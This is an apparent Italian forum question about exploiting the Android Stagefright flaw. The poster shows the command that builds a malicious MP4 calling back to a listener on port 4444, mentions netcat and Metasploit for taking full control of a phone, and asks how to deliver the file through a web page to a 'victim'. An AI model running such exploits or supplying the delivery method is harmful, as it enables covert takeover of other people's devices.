Ultimamente sto facendo molte ricerche su Stagefright ed è stato confermato che molti modelli di telefono con Android Lollipop e versioni successive sono suscettibili di exploit.
Quindi, dal momento che il mio S3 si è rivelato vulnerabile all'utilizzo che ha utilizzato Zimperium's Stage Detector App Ho deciso di metterlo alla prova.
Ho scaricato il codice stagefright di Joshua Drake ( mp4.py ) e sono riuscito a creare il file MP4 dannoso eseguendo:
python mp4.py -c 192.168.x.x -p 4444
c per LAN IP
p per il numero di porta
Ora un sacco di tutorial online dicono che prima di inviare il file MP4 tramite MMS al telefono di destinazione, devo impostare una backdoor usando netcat. Tuttavia, ho scoperto che creare una backdoor usando metasploit è molto più efficace per ottenere il pieno controllo del telefono.
Ho sentito che potresti anche incorporare l'MP4 o altri file multimediali in una pagina web in modo tale che quando una vittima visita la pagina web, puoi avere il pieno controllo del telefono nello stesso modo sopra menzionato.
Quindi, come si può ottenere?